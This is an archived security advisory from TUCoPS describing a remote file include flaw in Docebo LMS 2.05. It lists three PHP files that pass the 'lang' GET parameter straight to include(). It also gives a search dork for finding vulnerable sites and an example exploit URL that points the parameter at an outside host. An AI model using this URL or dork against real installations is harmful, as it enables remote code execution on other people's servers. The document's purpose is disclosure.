TUCoPS :: Web :: Apps :: b06-2490.htm

Docebo LMS 2.05 Remote File Include
Docebo LMS 2.05 Remote File Include
Docebo LMS 2.05 Remote File Include



Vulnerable Script: Docebo LMS 2.05
Discovered: beford 

Noobs: %22Based+on+DoceboLMS+2.0%22

Vulnerable Files

doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');

http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http:///? 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH